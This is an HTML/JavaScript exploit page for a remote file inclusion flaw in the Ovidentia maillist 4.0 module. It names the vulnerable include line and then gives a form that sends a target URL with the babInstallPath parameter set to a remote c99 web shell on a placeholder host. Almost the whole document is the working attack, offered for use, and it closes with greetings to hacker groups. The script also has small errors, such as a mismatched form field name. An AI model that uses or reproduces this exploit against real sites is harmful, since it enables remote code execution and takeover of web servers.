<!-- # Title: Ovidentia maillist 4.0 Module Remote File Inclusion Exploit # Author: bd0rk # eMail: bd0rk[at]hackermail.com # Twitter: twitter.com/bd0rk # Tested on: Ubuntu-Linux # Google-Dork: n/a-->Not for kiddies! # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fmaillist&file=maillist-4-0.zip&idf=794 PoC: maillist-4-0/programs/mlincl.php line 4 ------------------------------------------------------------------------ @include_once $GLOBALS['babInstallPath'].'utilit/registerglobals.php'; ------------------------------------------------------------------------ Greetz: GoLd_M(Welcome back bro'!) :), x0r_32, Anonymous, LulzSec ---------------- ~~Exploitcode~~ ---------------- --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <script language="JavaScript"> var a="/maillist-4-0/programs/" var b="mlincl.php" var c="?GLOBALS[babInstallPath]=" var shellcode="http://yourshellpath.com/c99.txt?" function it(){ xpl.action= document.xpl.victim.value+a+b+c+shellcode;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="middle"><font color="#0000FF"><b>Ovidentia maillist 4.0 Module Remote File Inclusion Exploit</b></font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <b><font face="Tahoma" size="2"><font color="#FF0000">Usage</font>:http://someone/directory</a></font> or </font> <font face="Tahoma" size="2" color="#000000">http://someone</font><font size="2" face="Tahoma"></a> <font size="2">&nbps;--></font></font></b><font size="2" face="Tahoma"> <input type="text" name="someone" size="20";"></p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> &nbps;</p> </center> </body> </html>
体验盒子